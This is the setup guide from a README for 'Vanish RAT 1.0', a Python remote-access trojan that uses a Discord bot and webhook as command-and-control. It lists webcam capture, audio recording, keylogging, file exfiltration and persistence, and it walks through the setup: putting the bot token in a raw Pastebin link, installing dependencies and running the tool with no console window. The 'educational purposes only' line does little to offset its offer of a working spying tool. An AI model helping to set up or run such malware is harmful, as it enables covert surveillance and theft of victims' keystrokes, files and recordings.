
Python-based Discord RAT with remote command panel for webcam capture, audio recording, keylogging, file exfiltration, and persistence via Discord bot and webhook C2.

For educational purposes only!!
Discord Rat - Setup Guide
Create a Pastebin/Gist with: Line 1: Your Discord Bot Token Line 2: Your Discord Webhook URL
Make sure it's RAW viewable (Unlisted or Public)
Copy the RAW link and paste it into Rat.py: Example: config_url = "https://pastebin.com/raw/YourPasteID"
Install the required packages: pip install -r requirements.txt OR manually install: pip install discord requests pypiwin32 pycaw comtypes opencv-python numpy sounddevice scipy pyautogui pynput cryptography pycryptodome pillow aiofiles pyttsx3
Run the bot: python Rat.pyw
For No Console Window:
Once bot is running, type: .help To view available commands.
ENJOY USING VANISH RAT 1.0